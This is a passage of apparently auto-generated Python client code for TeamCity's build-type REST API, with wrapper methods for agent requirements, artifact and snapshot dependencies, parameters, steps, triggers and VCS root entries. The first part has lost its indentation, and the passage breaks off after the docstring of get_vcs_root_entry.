def delete_vcs_root_entry(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""delete_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_vcs_root_entry(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
return data
def get_agent_requirement(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""get_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_requirement(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str fields:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
return data
def get_agent_requirements(self, bt_locator, **kwargs): # noqa: E501
"""get_agent_requirements # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_requirements(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: AgentRequirements
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_agent_requirements_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_agent_requirements_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_aliases(self, bt_locator, field, **kwargs): # noqa: E501
"""get_aliases # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_aliases(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: Items
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_aliases_with_http_info(bt_locator, field, **kwargs) # noqa: E501
else:
(data) = self.__get_aliases_with_http_info(bt_locator, field, **kwargs) # noqa: E501
return data
def get_artifact_dep(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""get_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_dep(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str fields:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
return data
def get_artifact_dep_setting(self, bt_locator, artifact_dep_locator, field_name, **kwargs): # noqa: E501
"""get_artifact_dep_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_dep_setting(bt_locator, artifact_dep_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__get_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
return data
def get_artifact_deps(self, bt_locator, **kwargs): # noqa: E501
"""get_artifact_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_deps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: ArtifactDependencies
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_artifact_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_artifact_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_build_types(self, **kwargs): # noqa: E501
"""get_build_types # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_build_types(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str locator:
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_build_types_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__get_build_types_with_http_info(**kwargs) # noqa: E501
return data
def get_children(self, path, bt_locator, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_children_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_children_alias(self, path, bt_locator, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children_alias(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_children_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_content(self, path, bt_locator, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str response_builder:
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_content_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_content_alias(self, path, bt_locator, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content_alias(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_content_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_current_vcs_instances(self, bt_locator, **kwargs): # noqa: E501
"""get_current_vcs_instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_current_vcs_instances(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootInstances
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_current_vcs_instances_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_current_vcs_instances_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_current_vcs_instances_obsolete(self, bt_locator, **kwargs): # noqa: E501
"""get_current_vcs_instances_obsolete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_current_vcs_instances_obsolete(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootInstances
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_current_vcs_instances_obsolete_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_current_vcs_instances_obsolete_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_example_new_project_description(self, bt_locator, **kwargs): # noqa: E501
"""get_example_new_project_description # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_example_new_project_description(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: NewBuildTypeDescription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_example_new_project_description_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_example_new_project_description_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_example_new_project_description_compatibility_version1(self, bt_locator, **kwargs): # noqa: E501
"""get_example_new_project_description_compatibility_version1 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_example_new_project_description_compatibility_version1(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: NewBuildTypeDescription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_example_new_project_description_compatibility_version1_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_example_new_project_description_compatibility_version1_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_feature(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""get_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def get_feature_parameter(self, bt_locator, feature_id, parameter_name, **kwargs): # noqa: E501
"""get_feature_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature_parameter(bt_locator, feature_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str parameter_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
return data
def get_feature_parameters(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""get_feature_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature_parameters(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def get_feature_setting(self, bt_locator, feature_id, name, **kwargs): # noqa: E501
"""get_feature_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_feature_setting(bt_locator, feature_id, name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
else:
(data) = self.__get_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
return data
def get_features(self, bt_locator, **kwargs): # noqa: E501
"""get_features # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_features(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: Features
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_features_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_features_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_investigations(self, bt_locator, **kwargs):  # noqa: E501
    """get_investigations  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_investigations(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Investigations
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_investigations_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_metadata(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_metadata  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_metadata(path, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param str fields:
    :param bool resolve_parameters:
    :return: File
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_metadata_with_http_info(path, bt_locator, **kwargs)  # noqa: E501
def get_parameter(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameter(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str fields:
    :return: ModelProperty
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameter_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def get_parameter_0(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_0  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameter_0(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str fields:
    :return: ModelProperty
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameter_0_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def get_parameter_type(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_type  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameter_type(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :return: Type
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameter_type_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def get_parameter_type_raw_value(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_type_raw_value  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameter_type_raw_value(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameter_type_raw_value_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def get_parameter_value_long(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_value_long  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameter_value_long(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameter_value_long_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def get_parameter_value_long_0(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_value_long_0  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameter_value_long_0(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameter_value_long_0_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def get_parameters(self, bt_locator, **kwargs):  # noqa: E501
    """get_parameters  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameters(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str locator:
    :param str fields:
    :return: Properties
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameters_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_parameters_0(self, bt_locator, **kwargs):  # noqa: E501
    """get_parameters_0  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_parameters_0(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str locator:
    :param str fields:
    :return: Properties
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_parameters_0_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_requirement_setting(self, bt_locator, agent_requirement_locator, field_name, **kwargs):  # noqa: E501
    """get_requirement_setting  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_requirement_setting(bt_locator, agent_requirement_locator, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str agent_requirement_locator: (required)
    :param str field_name: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs)  # noqa: E501
def get_root(self, bt_locator, **kwargs):  # noqa: E501
    """get_root  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_root(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str base_path:
    :param str locator:
    :param str fields:
    :param bool resolve_parameters:
    :return: Files
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_root_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_settings_file(self, bt_locator, **kwargs):  # noqa: E501
    """get_settings_file  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_settings_file(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_settings_file_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_snapshot_dep(self, bt_locator, snapshot_dep_locator, **kwargs):  # noqa: E501
    """get_snapshot_dep  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_snapshot_dep(bt_locator, snapshot_dep_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str snapshot_dep_locator: (required)
    :param str fields:
    :return: SnapshotDependency
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs)  # noqa: E501
def get_snapshot_deps(self, bt_locator, **kwargs):  # noqa: E501
    """get_snapshot_deps  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_snapshot_deps(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: SnapshotDependencies
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_snapshot_deps_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_step(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """get_step  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_step(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str fields:
    :return: Step
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_step_with_http_info(bt_locator, step_id, **kwargs)  # noqa: E501
def get_step_parameter(self, bt_locator, step_id, parameter_name, **kwargs):  # noqa: E501
    """get_step_parameter  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_step_parameter(bt_locator, step_id, parameter_name, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str parameter_name: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs)  # noqa: E501
def get_step_parameters(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """get_step_parameters  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_step_parameters(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str fields:
    :return: Properties
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_step_parameters_with_http_info(bt_locator, step_id, **kwargs)  # noqa: E501
def get_step_setting(self, bt_locator, step_id, field_name, **kwargs):  # noqa: E501
    """get_step_setting  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_step_setting(bt_locator, step_id, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str field_name: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs)  # noqa: E501
def get_steps(self, bt_locator, **kwargs):  # noqa: E501
    """get_steps  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_steps(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Steps
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_steps_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_template(self, bt_locator, template_locator, **kwargs):  # noqa: E501
    """get_template  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_template(bt_locator, template_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str template_locator: (required)
    :param str fields:
    :return: BuildType
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_template_with_http_info(bt_locator, template_locator, **kwargs)  # noqa: E501
def get_templates(self, bt_locator, **kwargs):  # noqa: E501
    """get_templates  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_templates(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: BuildTypes
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_templates_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_trigger(self, bt_locator, trigger_locator, **kwargs):  # noqa: E501
    """get_trigger  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_trigger(bt_locator, trigger_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str trigger_locator: (required)
    :param str fields:
    :return: Trigger
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_trigger_with_http_info(bt_locator, trigger_locator, **kwargs)  # noqa: E501
def get_trigger_setting(self, bt_locator, trigger_locator, field_name, **kwargs):  # noqa: E501
    """get_trigger_setting  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_trigger_setting(bt_locator, trigger_locator, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str trigger_locator: (required)
    :param str field_name: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs)  # noqa: E501
def get_triggers(self, bt_locator, **kwargs):  # noqa: E501
    """get_triggers  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_triggers(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Triggers
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_triggers_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_vcs_labeling_options(self, bt_locator, **kwargs):  # noqa: E501
    """get_vcs_labeling_options  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_vcs_labeling_options(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :return: VcsLabeling
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_vcs_labeling_options_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_vcs_root_entries(self, bt_locator, **kwargs):  # noqa: E501
    """get_vcs_root_entries  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_vcs_root_entries(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: VcsRootEntries
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_vcs_root_entries_with_http_info(bt_locator, **kwargs)  # noqa: E501
def get_vcs_root_entry(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """get_vcs_root_entry  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_vcs_root_entry(bt_locator, vcs_root_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :param str fields:
    :return: VcsRootEntry
    """
